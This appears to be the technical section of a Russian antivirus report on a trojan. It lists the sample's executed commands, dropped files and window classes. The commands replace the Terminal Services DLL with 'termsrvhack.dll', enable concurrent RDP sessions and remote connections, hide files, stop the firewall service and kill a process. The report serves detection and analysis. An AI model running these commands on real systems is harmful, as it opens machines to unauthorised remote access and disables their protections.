Техническая информация
- '%WINDIR%\devcon.exe' install %WINDIR%\inf\machine.inf root\rdpdr
- '%WINDIR%\3.exe'
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\runonce.exe' -r
- '<SYSTEM32>\svchost.exe' -k DComLaunch
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\cmd.exe' /c "%CommonProgramFiles%\3.bat"
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\ntsd.exe' -c q -p 844
- '<SYSTEM32>\findstr.exe' /i "TermService" 111111.txt
- <SYSTEM32>\svchost.exe
- %WINDIR%\111111.txt
- %WINDIR%\222222.txt
- <SYSTEM32>\termsrvhack.dll
- %CommonProgramFiles%\3.bat
- %WINDIR%\termsrvhack.dll
- %WINDIR%\3.exe
- %WINDIR%\devcon.exe
- <SYSTEM32>\termsrvhack.dll
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'